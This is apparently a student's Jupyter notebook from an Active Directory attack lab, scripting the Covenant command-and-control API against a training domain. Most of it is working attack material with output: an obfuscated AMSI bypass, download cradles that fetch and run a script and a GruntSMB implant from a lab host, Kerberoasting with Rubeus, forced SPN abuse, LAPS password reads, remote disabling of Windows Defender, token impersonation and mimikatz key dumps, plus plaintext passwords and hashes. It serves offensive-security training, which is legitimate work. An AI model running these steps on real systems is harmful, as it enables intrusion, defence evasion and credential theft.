# Using Covenant for Attacking and Defending AD

### Week 2

### Use of Covenant through API

In [5]:
import requests
import json
import time

# For pprint of json
from pprint import pprint

# Remove the InsecureRequestWarning from requests
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

covenantURL = "https://127.0.0.1:7443"
username="api"
password="qw34t5ry6RT45yrhfnghty675ythrgf654yrTT"

covenantLogin = covenantURL + "/api/users/login"
cHeaders = {"accept": "text/plain", "Content-Type":"application/json"}
cData = {"id": "string", "userName": username, "password": password}

resp = requests.post(covenantLogin, headers=cHeaders, data=json.dumps(cData), verify=False)
info = json.loads(resp.content) # Gather the content of the response
cToken = info['covenantToken']
#print(info['covenantToken']) # Pull the covenantToken

# Gather information for the grunts in the interface...
covenantGruntInfo = covenantURL + "/api/grunts"
cHeaders = {"Authorization": "Bearer " + cToken}
resp = requests.get(covenantGruntInfo, headers=cHeaders, verify=False)
info = json.loads(resp.content)
for i in info:
    gruntID = i['id']
    gruntName = i['name']
    activationTime = i['activationTime']
    lastCheckIn = i['lastCheckIn']
    info = "ID: " + str(gruntID)
    info += " Grunt Name: " + gruntName
    #info += " Activation Time: " + activationTime
    info += "\tLast Check In: " + lastCheckIn
    print(info)

ID: 2 Grunt Name: 99b1bc3bd4	Last Check In: 2021-07-07T00:08:30.4431405
ID: 3 Grunt Name: 4a46c6b5d5	Last Check In: 0001-01-01T00:00:00
ID: 4 Grunt Name: 483aafadcc	Last Check In: 2021-07-13T05:16:19.9758806
ID: 5 Grunt Name: f55bfa34e5	Last Check In: 0001-01-01T00:00:00
ID: 6 Grunt Name: 6548ad3a84	Last Check In: 2021-07-17T01:41:11.9364028


### Functions used for API

In [6]:
activeGruntID="6"

# Select the Grunt ID from above that you want to interact with...
def executePS(c):
    #global activeGruntID
    covenantInteract = covenantURL + "/api/grunts/" + activeGruntID + "/interact"
    command = "Powershell " + c
    cHeaders = {"Authorization": "Bearer " + cToken, "accept": "application/json", "Content-Type":"application/json"}
    cData = command
    resp = requests.post(covenantInteract, headers=cHeaders, data=json.dumps(cData), verify=False)
    #pprint(resp.content)
    info = json.loads(resp.content) # Gather the content of the response
    taskID = info['id']
    taskCommand = info['command']
    gruntTaskID = info['gruntTaskingId']
    print("-- Command Sent --\nGrunt Task ID:" + str(gruntTaskID) + "\n" + taskCommand)
    # Wait 20 seconds and then try and gather the task output
    print("\n\n")
    time.sleep(20)
    gatherTask(gruntTaskID)
    
# Execute a Command Line Command
def executeCMD(c):
    #global activeGruntID
    covenantInteract = covenantURL + "/api/grunts/" + activeGruntID + "/interact"
    command = "shellcmd " + c
    cHeaders = {"Authorization": "Bearer " + cToken, "accept": "application/json", "Content-Type":"application/json"}
    cData = command
    resp = requests.post(covenantInteract, headers=cHeaders, data=json.dumps(cData), verify=False)
    #pprint(resp.content)
    info = json.loads(resp.content) # Gather the content of the response
    taskID = info['id']
    taskCommand = info['command']
    gruntTaskID = info['gruntTaskingId']
    print("-- Command Sent --\nGrunt Task ID:" + str(gruntTaskID) + "\n" + taskCommand)
    # Wait 20 seconds and then try and gather the task output
    print("\n\n")
    time.sleep(20)
    gatherTask(gruntTaskID)
    
# Execute a command through PSRemoting by specifying the machine and command
def executePSRemote(m, c):
    #global activeGruntID
    covenantInteract = covenantURL + "/api/grunts/" + activeGruntID + "/interact"
    command = "PowerShellRemotingCommand " + m + " \"" + c + "\""
    cHeaders = {"Authorization": "Bearer " + cToken, "accept": "application/json", "Content-Type":"application/json"}
    cData = command
    resp = requests.post(covenantInteract, headers=cHeaders, data=json.dumps(cData), verify=False)
    #pprint(resp.content)
    info = json.loads(resp.content) # Gather the content of the response
    taskID = info['id']
    taskCommand = info['command']
    gruntTaskID = info['gruntTaskingId']
    print("-- Command Sent --\nGrunt Task ID:" + str(gruntTaskID) + "\n" + taskCommand)
    # Wait 20 seconds and then try and gather the task output
    print("\n\n")
    time.sleep(20)
    gatherTask(gruntTaskID)
    
# Execute a raw command through API
def executeRaw(c):
    #global activeGruntID
    covenantInteract = covenantURL + "/api/grunts/" + activeGruntID + "/interact"
    command = c
    cHeaders = {"Authorization": "Bearer " + cToken, "accept": "application/json", "Content-Type":"application/json"}
    cData = command
    resp = requests.post(covenantInteract, headers=cHeaders, data=json.dumps(cData), verify=False)
    #pprint(resp.content)
    info = json.loads(resp.content) # Gather the content of the response
    taskID = info['id']
    taskCommand = info['command']
    gruntTaskID = info['gruntTaskingId']
    print("-- Command Sent --\nGrunt Task ID:" + str(gruntTaskID) + "\n" + taskCommand)
    # Wait 20 seconds and then try and gather the task output
    print("\n\n")
    time.sleep(20)
    gatherTask(gruntTaskID)
    
#gruntTaskID --> results are stored as a --> gruntCommandID for the output
    
def gatherTask(tID):
    # Can be used to see if the command completed...
    covenantGruntTask = covenantURL + "/api/taskings/" + str(tID)
    #covenantGruntTask = covenantURL + "/api/grunts/" + str(activeGruntID) + "/taskings"
    cHeaders = {"Authorization": "Bearer " + cToken}
    resp = requests.get(covenantGruntTask, headers=cHeaders, verify=False)
    #pprint(resp.content)
    info = json.loads(resp.content)
    taskName = info['name']
    taskParam = info['parameters']
    taskStatus = info['status']
    gruntCommandID = info['gruntCommandId']
    #print(taskStatus)
    if taskStatus == "completed":
        # Same as above just referenced based on the name
        #covenantGruntInfo = covenantURL + "/api/grunts/taskings/1f33b2070f"
        # Task ID is taken from the above... If the command has completed...
        covenantGruntInfo = covenantURL + "/api/commandoutputs/" + str(gruntCommandID)
        cHeaders = {"Authorization": "Bearer " + cToken}
        resp = requests.get(covenantGruntInfo, headers=cHeaders, verify=False)
        info = json.loads(resp.content)
        print(info['output'])
    else:
        print("Task has not completed..." + taskName + " " + taskStatus + "\ntaskParam")

### AMSI Bypass

In [3]:
print("$a = ([char][byte]97+[char][byte]109+[char][byte]115+[char][byte]105+[char][byte]73+[char][byte]110+[char][byte]105+[char][byte]116+[char][byte]70+[char][byte]97+[char][byte]105+[char][byte]108+[char][byte]101+[char][byte]100);")
print("$b = ([char][byte]83+[char][byte]121+[char][byte]115+[char][byte]116+[char][byte]101+[char][byte]109+[char][byte]46+[char][byte]77+[char][byte]97+[char][byte]110+[char][byte]97+[char][byte]103+[char][byte]101+[char][byte]109+[char][byte]101+[char][byte]110+[char][byte]116+[char][byte]46+[char][byte]65+[char][byte]117+[char][byte]116+[char][byte]111+[char][byte]109+[char][byte]97+[char][byte]116+[char][byte]105+[char][byte]111+[char][byte]110+[char][byte]46+[char][byte]65+[char][byte]109+[char][byte]115+[char][byte]105+[char][byte]85+[char][byte]116+[char][byte]105+[char][byte]108+[char][byte]115);")
print("$t = [Ref].Assembly.GetType($b).GetField($a,'NonPublic,Static');")
print("$t.([char][byte]83+[char][byte]101+[char][byte]116+[char][byte]86+[char][byte]97+[char][byte]108+[char][byte]117+[char][byte]101)($null,$true)")

$a = ([char][byte]97+[char][byte]109+[char][byte]115+[char][byte]105+[char][byte]73+[char][byte]110+[char][byte]105+[char][byte]116+[char][byte]70+[char][byte]97+[char][byte]105+[char][byte]108+[char][byte]101+[char][byte]100);
$b = ([char][byte]83+[char][byte]121+[char][byte]115+[char][byte]116+[char][byte]101+[char][byte]109+[char][byte]46+[char][byte]77+[char][byte]97+[char][byte]110+[char][byte]97+[char][byte]103+[char][byte]101+[char][byte]109+[char][byte]101+[char][byte]110+[char][byte]116+[char][byte]46+[char][byte]65+[char][byte]117+[char][byte]116+[char][byte]111+[char][byte]109+[char][byte]97+[char][byte]116+[char][byte]105+[char][byte]111+[char][byte]110+[char][byte]46+[char][byte]65+[char][byte]109+[char][byte]115+[char][byte]105+[char][byte]85+[char][byte]116+[char][byte]105+[char][byte]108+[char][byte]115);
$t = [Ref].Assembly.GetType($b).GetField($a,'NonPublic,Static');
$t.([char][byte]83+[char][byte]101+[char][byte]116+[char][byte]86+[char][byte]97+[char][byte]108+[char

### Download Cradle for PS Script

In [4]:
print("iex ((New-Object System.Net.WebClient).DownloadString('http://192.168.99.10/remoteupdate.ps1'))")

iex ((New-Object System.Net.WebClient).DownloadString('http://192.168.99.10/remoteupdate.ps1'))


### Kerberoast the service accounts using powerview

In [5]:
executePS("Get-DomainUser -SPN")
# Without using powerview the following powershell command can be exeucted with the ADModule
# Get-ADUser -Filter { ServicePrincipalName -ne "$null" } -Properties ServicePrincipalName

-- Command Sent --
Grunt Task ID:4
Powershell Get-DomainUser -SPN





logoncount                    : 0
badpasswordtime               : 12/31/1600 4:00:00 PM
description                   : Key Distribution Center Service Account
distinguishedname             : CN=krbtgt,CN=Users,DC=us,DC=techcorp,DC=local
objectclass                   : {top, person, organizationalPerson, user}
name                          : krbtgt
primarygroupid                : 513
objectsid                     : S-1-5-21-210670787-2521448726-163245708-502
samaccountname                : krbtgt
admincount                    : 1
codepage                      : 0
samaccounttype                : USER_OBJECT
showinadvancedviewonly        : True
accountexpires                : NEVER
cn                            : krbtgt
whenchanged                   : 7/10/2019 4:53:40 PM
instancetype                  : 4
objectguid                    : 6dce7bd9-287f-4ab3-b5ba-0bb1e8aab391
lastlogon                     : 12/31/1600 4:

### Use Rubeus to Kerberoast

In [7]:
executeRaw("Rubeus kerberoast /nowrap")
# Gathered information about appsvc and serviceaccount

-- Command Sent --
Grunt Task ID:5
Rubeus kerberoast /nowrap




   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0 


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 2


[*] SamAccountName         : serviceaccount
[*] DistinguishedName      : CN=serviceaccount,CN=Users,DC=us,DC=techcorp,DC=local
[*] ServicePrincipalName   : USSvc/serviceaccount
[*] PwdLastSet             : 7/16/2019 7:03:27 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*serviceaccount$us.techcorp.local$USSvc/serviceaccount*$74CF041A8B93
                           

### Determine if studentuserx has UserAccountControl

In [8]:
executePS("(Find-InterestingDomainACL -ResolveGUIDs | ?({$_.IdentityReferenceName -match 'StudentUsers'}))")

-- Command Sent --
Grunt Task ID:6
Powershell (Find-InterestingDomainACL -ResolveGUIDs | ?({$_.IdentityReferenceName -match 'StudentUsers'}))



Task has not completed...4fb3e546fa tasked
taskParam


In [9]:
gatherTask(6)

[Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName
[Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName
[Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName
[Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName
[Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName
[Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-210670787-2521448726-163245708-1147' to a distinguishedname with Convert-ADName


ObjectDN                : CN=Support35User,CN=Users,DC=us,DC=techcorp,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : GenericAll
Ob

### Set SPN for supportxuser because User has GenericAll rights allowing the creation of a SPN

In [10]:
executePS("(Set-DomainObject -Identity support39user -Set @{serviceprincipalname='us/myspn39'} -Verbose)")

-- Command Sent --
Grunt Task ID:7
Powershell (Set-DomainObject -Identity support39user -Set @{serviceprincipalname='us/myspn39'} -Verbose)



[Get-DomainSearcher] search base: LDAP://US-DC.US.TECHCORP.LOCAL/DC=US,DC=TECHCORP,DC=LOCAL
[Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=support39user)(name=support39user)(displayname=support39user))))
[Set-DomainObject] Setting 'serviceprincipalname' to 'us/myspn39' for object 'Support39user'



In [11]:
# Rerun rubeus to kerberoast the user that we added a SPN
# Pulls the hash and we can attempt to crack offline...
executeRaw("Rubeus kerberoast /user:support39user /simple")
# Gathered information about appsvc and serviceaccount

-- Command Sent --
Grunt Task ID:8
Rubeus kerberoast /user:support39user /simple




   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0 


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User            : support39user
[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 1

$krb5tgs$23$*Support39user$us.techcorp.local$us/myspn39*$36BE307CBD5ED959799A0B0F6FB9B4ED$CE73E19B58195F7B492ADB5FCC43D04EF383621CF7798A96858C491C8E4012400033418D70D3F9225CB5CF75DFE72D1675D6B96F201B5616A541FC5F97A394D885071A06B4B2AA61E2508F2A6EF78B730B45FAD24ABAE736181708E2AA45744695155F5E8BD1F0AB4A26E2F75CA8B6A0A10CFCA5513F692C457E952AE3BD26EE44

In [ ]:
# You can use john to break the Kerberos TGS ticket to find the users password...

### Identify the LAPs users who have read access

In [5]:
executePS("(Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object { $_ | Add-Member NoteProperty 'Name'$(Convert-SidToName $_.SecurityIdentifier); $_ })")

-- Command Sent --
Grunt Task ID:13
Powershell (Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object { $_ | Add-Member NoteProperty 'Name'$(Convert-SidToName $_.SecurityIdentifier); $_ })



Task has not completed...cfa29778f6 tasked
taskParam


In [6]:
gatherTask(13)



AceQualifier           : AccessAllowed
ObjectDN               : OU=MailMgmt,DC=us,DC=techcorp,DC=local
ActiveDirectoryRights  : ReadProperty, ExtendedRight
ObjectAceType          : ms-Mcs-AdmPwd
ObjectSID              : 
InheritanceFlags       : ContainerInherit
BinaryLength           : 72
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback             : False
PropagationFlags       : InheritOnly
SecurityIdentifier     : S-1-5-21-210670787-2521448726-163245708-1116
AccessMask             : 272
AuditFlags             : None
IsInherited            : False
AceFlags               : ContainerInherit, InheritOnly
InheritedObjectAceType : Computer
OpaqueLength           : 0
Name                   : US\studentusers






### The studentusers are able to see the plaintext passwords of machines in the OU of mailmgmt

In [8]:
# Note the LAPS password changes in a regular interval...
executePS("(Get-DomainObject -SamAccountName us-mailmgmt | select -ExpandProperty ms-mcs-admpwd)")

-- Command Sent --
Grunt Task ID:27
Powershell (Get-DomainObject -SamAccountName us-mailmgmt | select -ExpandProperty ms-mcs-admpwd)



-v&w,6%#Q0,@o7



### Powershell Remote with the Acquired Password

In [10]:
# Cannot get this to work
executeRaw("PowerShellRemotingCommand /computername:'us-mailmgmt' /command:'hostname;whoami' /domain:'us-mailmgmt' /username:'administrator' /password:'Xh3Ix]g1fcbL1;'")

-- Command Sent --
Grunt Task ID:21
PowerShellRemotingCommand /computername:'us-mailmgmt' /command:'hostname;whoami' /domain:'us-mailmgmt' /username:'administrator' /password:'Xh3Ix\]g1fcbL1;'



[us-mailmgmt] Connecting to remote server us-mailmgmt failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.



### Manual PSRemote Connection

In [22]:
#$passwd = ConvertTo-SecureString '-v&w,6%#Q0,@o7' -AsPlainText -Force
#$creds = New-Object System.Management.Automation.PSCredential('us-mailmgmt\administrator', $passwd)
#$mailmgmt = New-PSSession -ComputerName us-mailmgmt -Credential $creds
#Invoke-Command -Session $mailmgmt -ScriptBlock { Get-Process }

#$passwd = ConvertTo-SecureString 'Xh3Ix]g1fcbL1;' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential("us-mailmgmt\administrator", $passwd); $mailmgmt = New-PSSession -ComputerName us-mailmgmt -Credential $creds; Invoke-Command -Session $mailmgmt -ScriptBlock { Get-Process }
# The below command is not working... But the powershell works great that is above in this code block...
#executePS("$passwd = ConvertTo-SecureString '-v&w,6%#Q0,@o7' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('us-mailmgmt\\administrator', $passwd); $mailmgmt = New-PSSession -ComputerName us-mailmgmt -Credential $creds; Invoke-Command -Session $mailmgmt -ScriptBlock { Get-Process } ")
# Disable Windows Defenders Realtime Checking...
executePS("$passwd = ConvertTo-SecureString '-v&w,6%#Q0,@o7' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('us-mailmgmt\\administrator', $passwd); $mailmgmt = New-PSSession -ComputerName us-mailmgmt -Credential $creds; Invoke-Command -Session $mailmgmt -ScriptBlock { Set-MpPreference -DisableRealtimeMonitoring $true }")

-- Command Sent --
Grunt Task ID:47
Powershell $passwd = ConvertTo-SecureString '-v&w,6%#Q0,@o7' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('us-mailmgmt\administrator', $passwd); $mailmgmt = New-PSSession -ComputerName us-mailmgmt -Credential $creds; Invoke-Command -Session $mailmgmt -ScriptBlock { Set-MpPreference -DisableRealtimeMonitoring $true }






In [23]:
gatherTask(47)

### Loading the GruntSMB.exe


iex ((New-Object System.Net.WebClient).DownloadString('http://192.168.99.10:8091/GruntSMB.exe')


### Create a Token on US Mail Mgmt and Copy File to Server

In [16]:
executeRaw("MakeToken 'administrator' 'us-mailmgmt' '-v&w,6%#Q0,@o7'")

-- Command Sent --
Grunt Task ID:39
MakeToken 'administrator' 'us-mailmgmt' '-v&w,6%#Q0,@o7'



Successfully made and impersonated token for user: 'us-mailmgmt'\\'administrator'


In [25]:
executeRaw("copy C:\\AD\\GruntSMB.exe \\\\us-mailmgmt\\C$\\Users\\Public\\GruntSMB.exe")

-- Command Sent --
Grunt Task ID:49
copy C:\AD\GruntSMB.exe \\us-mailmgmt\C$\Users\Public\GruntSMB.exe



System.IO.IOException: The user name or password is incorrect.

   at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
   at System.IO.File.InternalCopy(String sourceFileName, String destFileName, Boolean overwrite, Boolean checkHost)
   at Task.Execute(String Source, String Destination)


````
mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 84158 (00000000:000148be)
Session           : Service from 0
User Name         : exchangeuser
Domain            : US
Logon Server      : US-DC
Logon Time        : 1/6/2021 3:25:56 AM
SID               : S-1-5-21-210670787-2521448726-163245708-1137

	 * Username : exchangeuser
	 * Domain   : US.TECHCORP.LOCAL
	 * Password : (null)
	 * Key List :
	   aes256_hmac       9f0f4b3ae4699e9db821dd0e40f3f52f755dabd1e3434c5a7bad6d35cd8e4afa
	   rc4_hmac_nt       1ef08776e2de6e9d9062ff9c81ff3602
	   rc4_hmac_old      1ef08776e2de6e9d9062ff9c81ff3602
	   rc4_md4           1ef08776e2de6e9d9062ff9c81ff3602
	   rc4_hmac_nt_exp   1ef08776e2de6e9d9062ff9c81ff3602
	   rc4_hmac_old_exp  1ef08776e2de6e9d9062ff9c81ff3602



````

### Password for techcorp/pawadmin

In [27]:
print("G0dIHateC0mplexPasswords!")

G0dIHateC0mplexPasswords!


### Get AppLocker Policy

In [28]:
print("Get-AppLockerPolicy -Effective")

Get-AppLockerPolicy -Effective


### Check WDAC

In [29]:
print("Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard")

Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard
